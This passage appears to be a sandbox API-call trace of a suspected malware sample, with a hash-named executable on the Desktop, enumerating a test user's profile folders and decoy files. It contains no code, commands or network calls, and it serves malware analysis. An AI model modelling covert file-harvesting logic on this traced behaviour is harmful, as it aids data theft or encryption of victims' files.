[0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.524] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.524] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.524] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.524] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.524] PathFindFileNameW (pszPath="") returned="" [0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.524] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0175.525] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.525] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.525] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.525] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.525] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.525] PathFindFileNameW (pszPath="") returned="" [0175.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.526] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0175.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0175.526] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.526] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.527] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.527] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.527] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.527] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.527] PathFindFileNameW (pszPath="") returned="" [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.527] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0175.527] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.527] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0175.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.528] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.528] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.528] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.528] PathFindFileNameW (pszPath="") returned="" [0175.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.528] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.528] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.528] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5d340, ftCreationTime.dwHighDateTime=0x1d8a4d8, ftLastAccessTime.dwLowDateTime=0xa0d1f10, ftLastAccessTime.dwHighDateTime=0x1d8a71a, ftLastWriteTime.dwLowDateTime=0xa0d1f10, ftLastWriteTime.dwHighDateTime=0x1d8a71a, nFileSizeHigh=0x0, nFileSizeLow=0x3e6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0auOdApiPMQwtk.mp3", cAlternateFileName="0AUODA~1.MP3")) returned 1 [0175.528] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7784b980, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0x781d5000, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x40ec7600, ftLastWriteTime.dwHighDateTime=0x1d8a89d, nFileSizeHigh=0x0, nFileSizeLow=0xb6800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", cAlternateFileName="12471D~1.EXE")) returned 1 [0175.528] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519c6e50, ftCreationTime.dwHighDateTime=0x1d89dfe, ftLastAccessTime.dwLowDateTime=0xd3eba8d0, ftLastAccessTime.dwHighDateTime=0x1d8a344, ftLastWriteTime.dwLowDateTime=0xd3eba8d0, ftLastWriteTime.dwHighDateTime=0x1d8a344, nFileSizeHigh=0x0, nFileSizeLow=0xc959, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5fJKex2DUyLjzY0p.bmp", cAlternateFileName="5FJKEX~1.BMP")) returned 1 [0175.528] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4b4f0, ftCreationTime.dwHighDateTime=0x1d89b91, ftLastAccessTime.dwLowDateTime=0x1c99e340, ftLastAccessTime.dwHighDateTime=0x1d89fd4, ftLastWriteTime.dwLowDateTime=0x1c99e340, ftLastWriteTime.dwHighDateTime=0x1d89fd4, nFileSizeHigh=0x0, nFileSizeLow=0xfdf7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5gGbG59NQgc.flv", cAlternateFileName="5GGBG5~1.FLV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21baeca0, ftCreationTime.dwHighDateTime=0x1d898c4, ftLastAccessTime.dwLowDateTime=0xb05e6450, ftLastAccessTime.dwHighDateTime=0x1d8a13e, ftLastWriteTime.dwLowDateTime=0xb05e6450, ftLastWriteTime.dwHighDateTime=0x1d8a13e, nFileSizeHigh=0x0, nFileSizeLow=0xa0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="78tFz6xBRVYoOofh5u.avi", cAlternateFileName="78TFZ6~1.AVI")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd64f8530, ftCreationTime.dwHighDateTime=0x1d89cbc, ftLastAccessTime.dwLowDateTime=0x30ffbe40, ftLastAccessTime.dwHighDateTime=0x1d8a0d3, ftLastWriteTime.dwLowDateTime=0x30ffbe40, ftLastWriteTime.dwHighDateTime=0x1d8a0d3, nFileSizeHigh=0x0, nFileSizeLow=0x3b3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7rMc5PE99.bmp", cAlternateFileName="7RMC5P~1.BMP")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f5fb10, ftCreationTime.dwHighDateTime=0x1d89ed0, ftLastAccessTime.dwLowDateTime=0x7e7e8830, ftLastAccessTime.dwHighDateTime=0x1d8a273, ftLastWriteTime.dwLowDateTime=0x7e7e8830, ftLastWriteTime.dwHighDateTime=0x1d8a273, nFileSizeHigh=0x0, nFileSizeLow=0xa585, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9ji3dkVzY.avi", cAlternateFileName="9JI3DK~1.AVI")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1829bc40, ftCreationTime.dwHighDateTime=0x1d8a4d4, ftLastAccessTime.dwLowDateTime=0x2c9fa9f0, ftLastAccessTime.dwHighDateTime=0x1d8a62d, ftLastWriteTime.dwLowDateTime=0x2c9fa9f0, ftLastWriteTime.dwHighDateTime=0x1d8a62d, nFileSizeHigh=0x0, nFileSizeLow=0x161ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B8R3y.xlsx", cAlternateFileName="B8R3Y~1.XLS")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536f3cf0, ftCreationTime.dwHighDateTime=0x1d8a1f8, ftLastAccessTime.dwLowDateTime=0x949ace0, ftLastAccessTime.dwHighDateTime=0x1d8a389, ftLastWriteTime.dwLowDateTime=0x949ace0, ftLastWriteTime.dwHighDateTime=0x1d8a389, nFileSizeHigh=0x0, nFileSizeLow=0x7e1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BnBjzEzhtTp-mHA.png", cAlternateFileName="BNBJZE~1.PNG")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5aeadf0, ftCreationTime.dwHighDateTime=0x1d8a100, ftLastAccessTime.dwLowDateTime=0x4ce13070, ftLastAccessTime.dwHighDateTime=0x1d8a241, ftLastWriteTime.dwLowDateTime=0x4ce13070, ftLastWriteTime.dwHighDateTime=0x1d8a241, nFileSizeHigh=0x0, nFileSizeLow=0x12d51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C5Rx.mkv", cAlternateFileName="")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ebb49d0, ftCreationTime.dwHighDateTime=0x1d89de3, ftLastAccessTime.dwLowDateTime=0x690ae0d0, ftLastAccessTime.dwHighDateTime=0x1d8a29f, ftLastWriteTime.dwLowDateTime=0x690ae0d0, ftLastWriteTime.dwHighDateTime=0x1d8a29f, nFileSizeHigh=0x0, nFileSizeLow=0x5b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dyhqUG0jR8D4ISRX0Nn1.flv", cAlternateFileName="DYHQUG~1.FLV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x105801e0, ftCreationTime.dwHighDateTime=0x1d89ab9, ftLastAccessTime.dwLowDateTime=0xa22f04e0, ftLastAccessTime.dwHighDateTime=0x1d8a565, ftLastWriteTime.dwLowDateTime=0xa22f04e0, ftLastWriteTime.dwHighDateTime=0x1d8a565, nFileSizeHigh=0x0, nFileSizeLow=0x99e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ed-zOTKEEUdYISk.mp4", cAlternateFileName="ED-ZOT~1.MP4")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498f2e00, ftCreationTime.dwHighDateTime=0x1d8a71d, ftLastAccessTime.dwLowDateTime=0xc6c33610, ftLastAccessTime.dwHighDateTime=0x1d8a73f, ftLastWriteTime.dwLowDateTime=0xc6c33610, ftLastWriteTime.dwHighDateTime=0x1d8a73f, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eOgdOPqhf.odp", cAlternateFileName="EOGDOP~1.ODP")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f4be40, ftCreationTime.dwHighDateTime=0x1d8a5b4, ftLastAccessTime.dwLowDateTime=0xfc85a00, ftLastAccessTime.dwHighDateTime=0x1d8a607, ftLastWriteTime.dwLowDateTime=0xfc85a00, ftLastWriteTime.dwHighDateTime=0x1d8a607, nFileSizeHigh=0x0, nFileSizeLow=0x528c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f kf.mkv", cAlternateFileName="FKF~1.MKV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee89ba0, ftCreationTime.dwHighDateTime=0x1d8a497, ftLastAccessTime.dwLowDateTime=0xd5b8fa20, ftLastAccessTime.dwHighDateTime=0x1d8a586, ftLastWriteTime.dwLowDateTime=0xd5b8fa20, ftLastWriteTime.dwHighDateTime=0x1d8a586, nFileSizeHigh=0x0, nFileSizeLow=0x102d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FDSFO0.avi", cAlternateFileName="")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeac7d00, ftCreationTime.dwHighDateTime=0x1d8a051, ftLastAccessTime.dwLowDateTime=0x64ea29d0, ftLastAccessTime.dwHighDateTime=0x1d8a564, ftLastWriteTime.dwLowDateTime=0x64ea29d0, ftLastWriteTime.dwHighDateTime=0x1d8a564, nFileSizeHigh=0x0, nFileSizeLow=0xa011, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fjAnz4 q_5C_daasZw.ots", cAlternateFileName="FJANZ4~1.OTS")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5920ba50, ftCreationTime.dwHighDateTime=0x1d898d6, ftLastAccessTime.dwLowDateTime=0x1c2f4310, ftLastAccessTime.dwHighDateTime=0x1d8a0af, ftLastWriteTime.dwLowDateTime=0x1c2f4310, ftLastWriteTime.dwHighDateTime=0x1d8a0af, nFileSizeHigh=0x0, nFileSizeLow=0xccca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FMtIy2J60xYs_lff.png", cAlternateFileName="FMTIY2~1.PNG")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed3bd90, ftCreationTime.dwHighDateTime=0x1d8a6c7, ftLastAccessTime.dwLowDateTime=0xd70855d0, ftLastAccessTime.dwHighDateTime=0x1d8a6ec, ftLastWriteTime.dwLowDateTime=0xd70855d0, ftLastWriteTime.dwHighDateTime=0x1d8a6ec, nFileSizeHigh=0x0, nFileSizeLow=0x11b5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gnNW5oKgmW5QeElwN.mp4", cAlternateFileName="GNNW5O~1.MP4")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba98df0, ftCreationTime.dwHighDateTime=0x1d899a7, ftLastAccessTime.dwLowDateTime=0x9e3fec10, ftLastAccessTime.dwHighDateTime=0x1d89d30, ftLastWriteTime.dwLowDateTime=0x9e3fec10, ftLastWriteTime.dwHighDateTime=0x1d89d30, nFileSizeHigh=0x0, nFileSizeLow=0xad91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IabkKD4FQA.wav", cAlternateFileName="IABKKD~1.WAV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9688690, ftCreationTime.dwHighDateTime=0x1d898b4, ftLastAccessTime.dwLowDateTime=0x64a370c0, ftLastAccessTime.dwHighDateTime=0x1d89df9, ftLastWriteTime.dwLowDateTime=0x64a370c0, ftLastWriteTime.dwHighDateTime=0x1d89df9, nFileSizeHigh=0x0, nFileSizeLow=0x1708a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJReKTqGLBvZe.flv", cAlternateFileName="IJREKT~1.FLV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x287a1800, ftCreationTime.dwHighDateTime=0x1d8a2ff, ftLastAccessTime.dwLowDateTime=0x4b5425c0, ftLastAccessTime.dwHighDateTime=0x1d8a31b, ftLastWriteTime.dwLowDateTime=0x4b5425c0, ftLastWriteTime.dwHighDateTime=0x1d8a31b, nFileSizeHigh=0x0, nFileSizeLow=0xbe92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j3eSmPNiBweFL.wav", cAlternateFileName="J3ESMP~1.WAV")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd62e30, ftCreationTime.dwHighDateTime=0x1d8a11e, ftLastAccessTime.dwLowDateTime=0x56cb4ce0, ftLastAccessTime.dwHighDateTime=0x1d8a27f, ftLastWriteTime.dwLowDateTime=0x56cb4ce0, ftLastWriteTime.dwHighDateTime=0x1d8a27f, nFileSizeHigh=0x0, nFileSizeLow=0x14fd7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXSjMsaaHggbTx9Qy.rtf", cAlternateFileName="NXSJMS~1.RTF")) returned 1 [0175.529] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd66add0, ftCreationTime.dwHighDateTime=0x1d8a4f7, ftLastAccessTime.dwLowDateTime=0xc1cdefe0, ftLastAccessTime.dwHighDateTime=0x1d8a6b5, ftLastWriteTime.dwLowDateTime=0xc1cdefe0, ftLastWriteTime.dwHighDateTime=0x1d8a6b5, nFileSizeHigh=0x0, nFileSizeLow=0x17ca6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o5GqCe9ZgNw7JzfwVH.gif", cAlternateFileName="O5GQCE~1.GIF")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OhY9bMSmLfI5", cAlternateFileName="OHY9BM~1")) returned 1 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723c90 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74028ef0, ftCreationTime.dwHighDateTime=0x1d8a067, ftLastAccessTime.dwLowDateTime=0x2c712500, ftLastAccessTime.dwHighDateTime=0x1d8a1fd, ftLastWriteTime.dwLowDateTime=0x2c712500, ftLastWriteTime.dwHighDateTime=0x1d8a1fd, nFileSizeHigh=0x0, nFileSizeLow=0x815a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qC9h.jpg", cAlternateFileName="")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x962b0650, ftCreationTime.dwHighDateTime=0x1d89938, ftLastAccessTime.dwLowDateTime=0xa30dca0, ftLastAccessTime.dwHighDateTime=0x1d89b46, ftLastWriteTime.dwLowDateTime=0xa30dca0, ftLastWriteTime.dwHighDateTime=0x1d89b46, nFileSizeHigh=0x0, nFileSizeLow=0xe36b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ScQyRdBL.m4a", cAlternateFileName="")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 